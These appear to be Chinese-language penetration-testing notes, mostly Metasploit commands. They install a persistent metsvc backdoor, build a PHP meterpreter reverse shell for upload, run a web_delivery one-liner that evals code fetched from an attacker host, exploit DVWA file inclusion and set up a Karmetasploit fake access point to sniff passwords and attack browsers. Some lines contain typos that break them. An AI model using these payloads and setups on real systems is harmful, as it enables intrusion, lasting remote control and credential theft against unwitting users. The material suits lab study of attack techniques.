利用漏洞取得的meterpreter shell运行于内存中,重启失效
重复exploit漏洞可能造成服务崩溃
持久后门保证漏洞修复后仍可远程控制
run metsvc -A #删除-r use exploit/multi/handler set PAYLOAD windows/metsvc_bind_tcp set LPORT 31337 set RHOST 1.1.1.1
msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
MSF启动侦听
上传到web站点并通过浏览器访问
利用代码执行漏洞访问攻击者服务器
use exploit/multi/script/web_delivery
set target 1
php -d allow_url_fopen=true -r
"eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"
vi /etc/php5/cgi/php.ini allow_url_fogen = On allow_url_include = On use exploit/unix/webapp/php_include set RHOST 1.1.1.2 set PATH /dvwa/vulnerabilities/fi/ set PHPURL /?page=XXpathXX set HEADERS "Cookie:security=low; PHPSESSID=eefcf023ba61219d4745ad7487fe81d7" set payload php/meterpreter/reverse_tcp set lhost 1.1.1.1 exploit
伪造AP、嗅探密码、截获数据、浏览器攻击
wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
安装其他依赖包
gem install activerecord sqlite3-ruby
apt-get install isc-dhcp-server
cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
aythoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0{
range 10.0.0.100 10.0.0.254
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
airmon-ng start wlan0 airbase-ng -P -C 30 -e "FREE" -v wlan0mon ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 touch /var/lib/dhcp/dhcpd.leases dhcpd -cf /etc/dhcp/dhcpd.conf at0
msfconsole -q -r karma.rc_.txt
vi karma.rc_.txt
删除setgcanshu
增加browser_autopwn2等其他模块
检查恶意流量:auxiliary/vsploit/malware/dns*
再次启动Karmetasploit
添加路由和防火墙规则
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -P FORWARE ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
